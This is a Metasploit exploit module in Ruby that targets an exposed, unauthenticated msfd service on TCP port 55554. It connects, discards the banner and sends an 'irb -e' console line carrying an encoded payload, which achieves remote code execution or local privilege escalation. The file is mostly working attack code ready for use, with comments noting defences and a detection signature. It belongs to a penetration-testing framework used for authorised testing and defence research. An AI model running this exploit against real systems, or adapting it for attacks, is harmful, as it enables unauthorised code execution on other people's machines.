Path: blob/master/modules/exploits/multi/misc/msfd_rce_remote.rb
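##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Module for an msfd listener that is reachable over TCP.
#
# As the description below states, msfd exposes a msfconsole-like interface
# on a TCP socket. This module sends no credentials before issuing a console
# command, so whoever can reach the socket can run code as the msfd user.
#
# Defender notes (derived from what this module relies on):
# * The precondition is network reachability of the msfd port (55554 is the
#   default registered below). Keeping the listener on loopback and
#   filtering the port removes the remote case.
# * The description also covers local privilege escalation when msfd runs
#   with more privileges than the local user, so running msfd unprivileged
#   limits the impact.
# * The command sent on the wire is a console line beginning with `irb -e`,
#   which is a usable signature for network or host monitoring of msfd.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata, payload constraints and the default RPORT.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Metasploit msfd Remote Code Execution',
      'Description'    => %q{
        Metasploit's msfd-service makes it possible to get a msfconsole-like
        interface over a TCP socket. If this socket is accessible on a remote
        interface, an attacker can execute commands on the victim's machine.

        If msfd is running with higher privileges than the current local user,
        this module can also be used for privilege escalation. In that case,
        port forwarding on the compromised host can be used.

        Code execution is achieved with the msfconsole command: irb -e 'CODE'.
      },
      'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
      'License'        => BSD_LICENSE,
      'Platform'       => "ruby",
      'Arch'           => ARCH_RUBY,
      'Payload'        =>
        {
          'Space'       => 8192, # Arbitrary limit
          # \x27 (single quote) and \x0a (newline) are excluded because the
          # payload is wrapped in single quotes and the command line is
          # terminated by a newline in #exploit.
          'BadChars'    => "\x27\x0a",
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2018-04-11', # Vendor notification
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(55554)
      ])
  end

  # Connects and inspects the first data the service sends.
  #
  # The check only looks for the substring "msf" in the banner, so a match
  # means the service looks like msfd, not that code execution was verified.
  #
  # @return [Exploit::CheckCode] Appears when the banner contains "msf",
  #   Unknown otherwise (including when no banner is received)
  def check
    connect
    banner = sock.get_once
    disconnect

    # get_once can return nil when nothing arrives; treat that as "no banner"
    # instead of raising NoMethodError on nil.
    return Exploit::CheckCode::Appears if banner.to_s.include?("msf")

    return Exploit::CheckCode::Unknown
  end

  # Connects, discards the banner and sends one console line that wraps the
  # encoded payload in `irb -e '...'`, then closes the connection.
  def exploit
    connect
    sock.get_once # read and drop the banner before sending the command
    sock.put "irb -e '" + payload.encoded + "'\n"
    disconnect
  end
end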